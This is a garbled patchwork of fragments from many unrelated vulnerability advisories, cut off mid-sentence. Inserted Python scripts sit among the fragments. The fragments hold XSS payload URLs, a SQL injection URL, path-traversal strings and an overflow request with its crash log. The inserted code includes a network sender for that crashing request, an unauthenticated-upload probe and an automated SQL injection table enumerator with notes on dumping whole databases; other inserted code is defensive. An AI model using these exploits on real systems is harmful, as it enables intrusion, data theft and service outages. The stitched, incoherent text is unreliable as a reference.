proof of concept
This condition occurs if a TEL URI is activated at the same time that
Safari is closed by launching an external application, for example
the SMS application (launched to handle an SMS URI [2]). The SMS
application can be launched by placing an SMS URI as the source of an
iframe. This is shown in the first proof-of-concept exploit below.

Further investigation showed that this behavior can also be reproduced
by launching other applications such as Maps, YouTube, and iTunes.
Launching these applications can be achieved through loading special
SiteX CMS bundles third-party scripts from FCKeditor. One of them is
"includes/fck/editor/filemanager/upload/php/upload.php". This particular
script performs no check on who the requester is, so anyone can attempt
to upload files to a SiteX-powered website.
Here is a proof-of-concept file for testing:
------------>[proof-of-concept]<-----------
<html>
<body>
<center>
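The following Python is an added example, not SiteX's, FCKeditor's or the advisory author's code. It builds the multipart POST the upload connector at the path quoted above expects and interprets the connector's reply, so the missing-authentication claim can be verified with a harmless text file instead of a web shell. Assumptions: the FCKeditor 2.x PHP connector reads the upload from the form field named "NewFile", and it answers with a script calling window.parent.OnUploadCompleted(code, url, name, message), where code 0 means stored and 201 means stored under a renamed file name (as FCKeditor's own dialog interprets them); the target base URL is supplied by the caller.

```python
"""Unauthenticated-upload check for the FCKeditor PHP upload connector.
Added example; the connector path is from the advisory above, the field
name "NewFile" and the OnUploadCompleted reply format are assumptions
about FCKeditor 2.x stated in the lead-in."""
import re
import uuid
import urllib.request

UPLOAD_PATH = "/includes/fck/editor/filemanager/upload/php/upload.php"
FILE_FIELD = "NewFile"


def build_multipart(filename: str, content: bytes, boundary: str = ""):
    """Return (content_type, body) for a multipart/form-data POST carrying one file."""
    boundary = boundary or uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{FILE_FIELD}"; filename="{filename}"\r\n'
        "Content-Type: text/plain\r\n\r\n"
    ).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", body


# The connector replies with JavaScript for the editor's hidden iframe, e.g.
#   window.parent.OnUploadCompleted(0,"/userfiles/x.txt","x.txt","");
# Both quote styles are accepted here; the code is the only mandatory argument.
_RESULT = re.compile(r"OnUploadCompleted\(\s*(\d+)\s*(?:,\s*(['\"])(.*?)\2)?")


def parse_upload_response(html: str):
    """Return (error_code, stored_url), or None if the page did not answer like the connector
    (for example a login page, which is what a patched site should return)."""
    m = _RESULT.search(html)
    if not m:
        return None
    return int(m.group(1)), (m.group(3) or "")


def probe(base_url: str, timeout: float = 10.0):
    """Upload a harmless text marker and report whether it was accepted.
    Network call; not exercised by the tests. Code 0 or 201 means the site
    stored a file for an anonymous client, which is the vulnerable behaviour."""
    content_type, body = build_multipart("authz-check.txt", b"unauthenticated upload check\n")
    req = urllib.request.Request(base_url.rstrip("/") + UPLOAD_PATH, data=body, method="POST",
                                 headers={"Content-Type": content_type})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_upload_response(resp.read().decode("utf-8", "replace"))
```

Run `probe("http://sitex.example")` against a test instance; a result of `(0, ...)` or `(201, ...)` confirms the issue, `None` indicates the connector is no longer reachable anonymously. Delete the marker file afterwards.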
input in a sufficient way, causing vBulletin to be vulnerable to XSS attacks.
[1] Private Reflected XSS:
An attacker can inject scripts in a simple way, but the result is only visible to the attacker.
Proof of Concept:
url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />)
(This is only visible to the attacker when he or she is logged in and browsing his or her own profile.)
[2] Global Reflected XSS:
An attacker can inject malicious CSS data that executes JavaScript, which is then visible
Carvalho, from the Core Security Consulting Services (SCS) team of Core
Security Technologies during Bugweek 2007. Additional research was done
by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT).
*Technical Description / Proof of Concept Code*
Three vulnerabilities discovered in the iCal application may allow
unauthenticated attackers to execute arbitrary code on vulnerable
systems with (and potentially without) the assistance of the end user
of the application, or to repeatedly execute a denial of service attack
Since enough \..\..\ sequences will bring the path to the disk root, the
attacker can choose any location on the disk to write the file to. The file can,
for example, overwrite a critical system file, or create a file in the Autostart
folder.
See the Proof of Concept exploit at the bottom of this advisory.
== Vendor status and solution ==
The vendor has been informed and has released a new version (7.02) with this
issue being fixed.
Model: Blue Coat SG400
Software SGOS 4.2.1.6
Software Release ID: 25173
Proof of concept #1:
https://target:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00
Injected payload:
Having such a modified file, the only thing left to do is to convince somebody
to open it. This Denial of Service attack is not very harmful in practice,
although it is a typical header-based vulnerability and is advised to be corrected.
Proof of Concept: http://j00ru.vexillium.org/vuln/winimage/dos_PoC.IMG
2. Directory Traversal vulnerability
This vulnerability was discovered and researched by Francisco Falcon
from Core Security Technologies.
*Technical Description / Proof of Concept Code*
The WePO ActiveX component has a parameter named "mainurl" that
indicates the local file name or the URL from where to retrieve the
content to print:
arbitrary constant count. The player then parses constant values
(strings) from the string table, and continues reading null terminated
strings in the adjacent tag data, eventually reading from memory
adjacent to the Flash movie. References to these values are stored in
a table of constants that can be later accessed using a set of action
records. A proof of concept was developed and presented to the vendor
to demonstrate the threat of read beyond bounds issues to complex file
formats such as the SWF file format.
Finally, other issues were found that suggest the lack of validation
on the contents of the dictionary data structure. Elements in the
exceeds the size of the receiving buffer, subsequently causing an
invalid address to be read. On the Endpoints this causes a reboot. The
VCS will not reboot: the process crashes with SIGSEGV (or SIGABRT), but
the VCS restarts the process itself, which drops all calls.
Proof of Concept:
"GET /wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+" HTTP/1.1\r\nHost: 192.168.6.99\r\n\r\n"
Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670
Illegal memory access at: 0x5858585c
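The Python below is an added example, not Cisco's or the advisory author's code. It reproduces the request exactly as the proof of concept lays it out and relates the reported fault address to the bytes the request controls: 0x58 is ASCII 'X', so 0x5858585c is the four 'X' bytes read as a 32-bit pointer plus 4, which is what makes the crash output above evidence of a controlled invalid read rather than a random one. The host address is the one quoted in the PoC; the 0x1000-byte window used to decide "derived from our marker" is an assumption.

```python
"""Build the VCS getxml request from the advisory and relate the SIGSEGV
address to the controlled bytes. Added example; the crash address
0x5858585c and the request layout are taken from the advisory above."""
import socket


def build_request(host: str, pad_len: int = 5200) -> bytes:
    """GET /wsgi/getxml?location=<'A'*5200><0x60*4><'X'*4>, as laid out in the PoC.
    The 0x60 bytes and the X marker sit just past the 5200-byte filler so that
    whatever is read there is recognisable in a crash dump."""
    location = b"A" * pad_len + b"\x60" * 4 + b"X" * 4
    return (b"GET /wsgi/getxml?location=" + location + b" HTTP/1.1\r\n"
            b"Host: " + host.encode() + b"\r\n\r\n")


def controlled_offset(fault_addr: int, marker: bytes = b"X", width: int = 4):
    """If fault_addr lies within a small window (assumed 0x1000 bytes) above the
    value formed by the marker bytes (0x58585858 for 'XXXX'), return the offset.
    0x5858585c - 0x58585858 == 4: the invalid read used a pointer we supplied,
    dereferenced 4 bytes in. Returns None for unrelated addresses."""
    base = int.from_bytes(marker * width, "little")  # 'X' repeated: endianness does not matter
    off = fault_addr - base
    return off if 0 <= off < 0x1000 else None


def send_once(host: str, port: int = 80, timeout: float = 5.0) -> bytes:
    """Send the request and return whatever comes back (empty if the process died).
    Network call; not exercised by the tests. Per the advisory this crashes the
    target process and drops calls, so use it only against a system you own."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host))
        try:
            return s.recv(4096)
        except (socket.timeout, ConnectionError):
            return b""
```

`controlled_offset(0x5858585c)` returns 4 for the address in the crash log above; an address such as 0x41414141 (all 'A') would point at the filler instead, and anything else returns None.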
This vulnerability was discovered and researched by Jorge Luis Alvarez
Medina from Core Security Technologies.
*Technical Description / Proof of Concept Code*
Internet Explorer is the most popular Internet browser in the world as
it is an integrated component of every Windows installation. It
introduces the concept of URL Security Zones, as explained in [2], which
basically define a set of privileges for web applications (such as
by performing basic binary analysis of the generated audio file. The
issue is compounded by the fact that even if the audio feature of the
CAPTCHA has been disabled, it can still be accessed by forceful
browsing to the /secure_play.php URI.
Proof of Concept.
Proof of concept code that works against the example_form.php page and
the MP3 file format provided with the standard PHPCaptcha package
available from www.phpcaptcha.org is available at:
http://www.senseofsecurity.com.au/advisories/SOS-11-007.zip
The embedded device management interface does not validate the origin
of an HTTP request. If an attacker is able to make an authenticated
user visit a hostile web page, the device can be controlled by
submitting suitable forms. It is possible to steal information from
the device and modify the configuration. See the provided
proof-of-concept code for more information.
A successful attack requires that the attacker knows the management
interface address for the target device. As the management interface
is usually located at the default IP address and might even have the
default password in place, performing a successful attack is not far
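The Python below is an added example, not the device vendor's code, of the request validation the advisory says is missing: a state-changing request is accepted only if its Origin (or, failing that, Referer) names the device itself and it carries a per-session anti-CSRF token embedded in the device's own forms. The constructed requests use a default-style address, 192.168.1.1, and the field name csrf_token; both are assumptions. Because the check compares against the Host the browser actually targeted, it works whether or not the device sits at its default IP.

```python
"""Origin/token check for a device management interface, run over constructed
legitimate and hostile requests. Added example; the header handling and the
csrf_token field name are assumptions, not the vendor's implementation."""
import hmac
import secrets
from urllib.parse import urlsplit


def issue_token() -> str:
    """Per-session anti-CSRF token: stored server-side, embedded in the device's forms."""
    return secrets.token_urlsafe(32)


def _origin_host(headers: dict) -> str:
    """host[:port] from Origin, falling back to Referer; empty if neither is present."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).netloc.lower()
    return ""


def authorize_state_change(headers: dict, form: dict, session_token: str) -> tuple:
    """Return (allowed, reason). Both checks must pass: the request must come from a
    page served by this device (Origin/Referer == Host) and carry the session token.
    A missing Origin/Referer is rejected rather than trusted, since the hostile page
    cannot be distinguished from a legitimate one without it."""
    own_host = headers.get("Host", "").lower()
    origin = _origin_host(headers)
    if not origin:
        return False, "missing Origin/Referer"
    if origin != own_host:
        return False, f"cross-site request from {origin}"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, session_token):   # constant-time comparison
        return False, "bad or missing csrf_token"
    return True, "ok"


# Constructed requests: the victim's browser holds a session with the device at 192.168.1.1.
TOKEN = issue_token()
LEGIT = ({"Host": "192.168.1.1", "Origin": "http://192.168.1.1"},
         {"admin_password": "new", "csrf_token": TOKEN})
HOSTILE = ({"Host": "192.168.1.1", "Origin": "http://attacker.example"},
           {"admin_password": "pwned"})
NO_TOKEN = ({"Host": "192.168.1.1", "Referer": "http://192.168.1.1/config.html"},
            {"admin_password": "new"})
```

The hostile page's form post arrives with the victim's cookies, which is why the cookie alone cannot authorize a change; the token is something the hostile origin cannot read, and the Origin check catches the cross-site post even before the token is examined.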
from Core Security Exploit Writers Team. The publication of this
advisory was coordinated by Fernando Miranda from Core Security
Advisories Team.
8. *Technical Description / Proof of Concept Code*
This flaw is located in the hypervisor driver 'vmswitch.sys' of Windows
systems. The Proof of Concept shown in [Sec. 8.1] was tested on the
latest released version 6.1.7600.16701 of the above-mentioned driver.
/*
Family Connection <= 1.8.2 - Remote Command Execution
Proof of Concept - Written by Salvatore "drosophila" Fresta
The following software will create a file (rce.php) in the
specified path using a Blind SQL Injection bug. To execute remote
commands, you must open the file using a browser.
Technical Details:
Normal input for the 'LngId' parameter contains a code such as ENG, DEU, JP, denoting the language type. This parameter is not properly validated and the injection of SQL statements within it allows attackers unrestricted access to enumerate information from the database. For example:
https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1
Proof of Concept:
A Proof of Concept (RDdbenum.py) has been developed to automate enumeration of entire database content available from http://www.irmplc.com/Tools/RDdbenum.py
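The Python below is an added example, not IRM's RDdbenum.py, that implements the enumeration walk the injected URL above performs: each request asks for min(name) of the user tables (xtype 'U', written as char(85) to avoid a quote) whose name is greater than the last one seen, so the whole SYSOBJECTS table list is read one name per request. The endpoint and parameter names are taken from the advisory; the "vulnerable page" is a constructed stand-in that evaluates the injected predicate over a made-up table list, so the walk can be run offline.

```python
"""Walk SYSOBJECTS with the min(name) ... name > 'last' injection from the advisory.
Added example; ENDPOINT and the LngId payload shape come from the advisory above,
FAKE_SYSOBJECTS and fake_fetch are a constructed stand-in for the real page."""
import re
from urllib.parse import quote, urlsplit, parse_qs

ENDPOINT = "https://vulnerablehost.com:443/cms/ioRD.asp"


def build_lngid(last_name: str) -> str:
    """Injected LngId value: terminates the original column list, UNIONs in the smallest
    user-table name greater than last_name, and comments out the rest of the query."""
    escaped = last_name.replace("'", "''")   # stay inside the SQL string literal
    return (f"ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS "
            f"where xtype=char(85) and name> '{escaped}' ORDER BY 1;-- ")


def build_url(last_name: str) -> str:
    return f"{ENDPOINT}?Action=ShowMessage&LngId={quote(build_lngid(last_name))}&DisableAutoLogin=1"


def enumerate_tables(fetch, limit: int = 10000) -> list:
    """fetch(url) returns the table name the page rendered, or None when min() was NULL.
    Each round asks for the next name above the previous one, so names come back sorted."""
    names, last = [], ""
    while len(names) < limit:
        name = fetch(build_url(last))
        if not name:
            break
        names.append(name)
        last = name
    return names


# --- constructed stand-in for the injectable page (not a real CMS) ------------------
FAKE_SYSOBJECTS = ["IO_DGC_ENG", "IO_DGC_DEU", "IO_USERS", "IO_SESSIONS", "IO_MSG"]
_LAST = re.compile(r"name> '((?:[^']|'')*)'")


def fake_fetch(url: str):
    """Evaluates the injected predicate the way the database would: min(name) over the
    user tables with name > '<last>', or None once no name is greater."""
    lngid = parse_qs(urlsplit(url).query)["LngId"][0]
    last = _LAST.search(lngid).group(1).replace("''", "'")
    candidates = sorted(n for n in FAKE_SYSOBJECTS if n > last)
    return candidates[0] if candidates else None
```

Against a real target, replace fake_fetch with a function that requests the URL and extracts the name from the ShowMessage output; the walk terminates when the page shows an empty message, i.e. min() returned NULL. The same loop extended with `UNION SELECT min(column_name) FROM information_schema.columns where table_name='...'` reads column names, which is how full-content dumps are built from this primitive.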
Workaround / Solutions:
There are no known workarounds for this vulnerability.
This vulnerability was discovered and researched by Damian Frizza from
Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
8.1. *HP Openview NNM 7.53 Embedded DB Remote Denial Of Service*
HP Openview Network Node Manager includes an embedded database engine
1) Cross Site Scripting (XSS) in Chyrp: CVE-2012-1001
1.1 Input passed via the "content" POST parameter to /includes/ajax.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/includes/ajax.php" method="post">
<input type="hidden" name="action" value="preview" />
<input type="hidden" name="feather" value="" />
1) Cross-Site Scripting (XSS) in Fork CMS: CVE-2012-1188
1.1 Input passed via the "type" and "querystring" GET parameters to /private/en/error is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/private/en/error?type=action-not-allowed&querystring=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E.1
1.2 Input passed via the "name" GET parameter to /private/en/locale/index is not properly sanitised before being returned to the user.
problem related to Java SE security. Among a total of 19 weaknesses
discovered, there are issues that allow to either create a specific
Java security bypass condition or that facilitate the exploitation
process of a certain type of vulnerabilities.
Security Explorations developed reliable Proof of Concept codes for all
of the issues found. This includes 12 exploit codes that demonstrate a
complete JVM security sandbox bypass.
Malicious Java applet or application exploiting one of the most serious
issues found could run unrestricted in the context of a target Java
1.1 Input passed via the "language" GET parameter to upgrade.php is vulnerable to directory path traversal. The directory path passed to the "language" parameter is later used in include() function to include the following files: common.lang.php, admin.lang.php, install.lang.php and upgrade.lang.php.
Under certain conditions this can be exploited to include malicious PHP file and execute arbitrary PHP code. To exploit this vulnerability the attacker should create a file with the name from the list above (for example admin.lang.php) in the file system (for example in /tmp/) and try to include it via directory traversal.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/upgrade.php?language=../../../../../tmp/
/tmp/ directory should contain "admin.lang.php" file that will be used in include() call.
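Both traversal advisories on this page, the Windows `\..\..\` file write that climbs to the disk root and the `../../../../../tmp/` directory that upgrade.php passes to include(), are defeated by the same containment check. The Python below is an added example, not either vendor's code: it normalises a user-supplied path over both separator styles, rejects any path that climbs above the base directory, and joins the fixed file name the way the include() call does, so the check is applied to the path that will actually be opened. The base directories in the tests are constructed.

```python
"""Containment check for user-supplied relative paths, covering both the `\..\..\`
write-anywhere case and the `../../tmp/` include() case from the advisories above.
Added example; base directories used here are constructed."""
from typing import Optional


def normalize_user_path(user_path: str) -> Optional[list]:
    """Split on '/' and '\\', resolve '.' and '..', and return the segment list.
    Returns None if the path climbs above its starting directory: once there are
    more '..' than levels, every further '..' stays at the root, which is exactly
    why 'more than enough' of them lets an attacker pick any location on disk."""
    segments = []
    for part in user_path.replace("\\", "/").split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not segments:
                return None
            segments.pop()
        else:
            segments.append(part)
    return segments


def safe_join(base: str, user_path: str, filename: str = "") -> Optional[str]:
    """Join base + user_path (+ filename, as include(dir . 'admin.lang.php') would),
    or None if the result would leave base. Absolute and drive-letter inputs are
    rejected outright rather than normalised. Decode percent-encoding before calling."""
    if user_path.startswith(("/", "\\")) or (len(user_path) > 1 and user_path[1] == ":"):
        return None
    segments = normalize_user_path(user_path)
    if segments is None:
        return None
    parts = [base.rstrip("/")] + segments + ([filename] if filename else [])
    return "/".join(parts)
```

A directory that goes down and back up (`lang/../en`) is fine and resolves normally; only escaping the base is refused. For the include() case the stronger fix is an allow-list of language codes, since no user-controlled directory should reach include() at all; the containment check is the general-purpose fallback.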
1) Multiple Cross-Site Scripting (XSS) in pragmaMx: CVE-2012-2452
1.1 Input passed via a name of a GET parameter to modules.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/modules.php?name=Themetest&%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
1.2 Input passed via the "img_url" GET parameter to /includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
7. *Credits*
These vulnerabilities were discovered and researched by Jorge Luis
Alvarez Medina and Federico Muttis from Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
The bugs in this advisory as well as a number of specific methods to
combine them with insecure Internet Explorer features are discussed in
the paper "Abusing Insecure Features of Internet Explorer"[5].
Exploitation of these vulnerabilities as well as others disclosed
Note: an XSS attack was not possible here.
------------------
PROOF OF CONCEPT:
------------------
http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>
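The reflected XSS proofs of concept collected on this page (vBulletin's CSS url() payload, the Blue Coat crl_format parameter with its trailing %00, the Chyrp, Fork CMS and pragmaMx URLs, and the Tuenti fragment above) all reduce to markup arriving in a parameter and being echoed undecoded. The Python below is an added example, not any of the vendors' code: it decodes the parameters of a request URL, including parameter names (pragmaMx reflects the name, not the value) and the fragment (the Tuenti payload lives after `#`), flags anything containing a tag, an event handler or a javascript: scheme, and shows the output encoding the fixed pages should apply. The sample URLs are copied from the advisories with their placeholder hosts left as they are; the vBulletin payload's String.fromCharCode call is shortened to alert(1).

```python
"""Reflected-XSS triage over the URLs quoted in this page, plus the escaping that
neutralises them in HTML text or a quoted attribute. Added example; the sample
payloads are taken from the advisories above, hosts are their placeholders."""
import html
import re
from urllib.parse import parse_qsl

# Markup that must never survive decoding inside a reflected parameter:
# a tag start or end, an on* event handler, or a javascript: URL.
_XSS = re.compile(r"</?[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def suspicious_text(text: str) -> bool:
    return bool(_XSS.search(text))


def _query_and_fragment(url: str):
    """Pull out the query and the fragment without urlsplit, which rejects the
    '[host]' placeholders these advisories use."""
    rest, frag = (url.split("#", 1) + [""])[:2]
    query = rest.split("?", 1)[1] if "?" in rest else ""
    return query, frag


def suspicious_params(url: str) -> list:
    """Return (where, decoded_text) for each parameter name or value carrying markup.
    parse_qsl percent-decodes, so %3Cscript%3E and %00 are seen as the browser's
    target application would see them (a null byte does not stop the payload)."""
    hits = []
    for part in _query_and_fragment(url):
        for name, value in parse_qsl(part, keep_blank_values=True):
            for where, text in (("name", name), ("value", value)):
                if suspicious_text(text):
                    hits.append((where, text))
    return hits


def reflect_safely(text: str) -> str:
    """Encoding for echoing input into HTML text or a quoted attribute value."""
    return html.escape(text, quote=True)


SAMPLES = [  # copied from the advisories on this page
    'https://target:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00',
    "http://[host]/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E",
    "http://[host]/modules.php?name=Themetest&%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E",
    'http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>',
]
VBULLETIN_PAYLOAD = 'url(</script><img src="x:x" onerror="alert(1)" />)'  # bare parameter value
```

html.escape is the right fix only for the HTML text and quoted-attribute sinks (Blue Coat, Chyrp, Fork CMS, pragmaMx, Tuenti). The vBulletin payload lands inside a CSS url() value, where HTML escaping does not apply; that sink needs the value validated against a URL allow-list or CSS-escaped before it is written into the stylesheet.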
This vulnerability was discovered and researched by Sebastian Muniz from
the Exploit Writers Team (EWT) at Core Security Technologies.
*Technical Description / Proof of Concept Code*
WonderWare SuiteLink is a service that runs on Microsoft Windows
Operating Systems listening for connections on port 5413/tcp.
Unauthenticated client programs connecting to the service can send a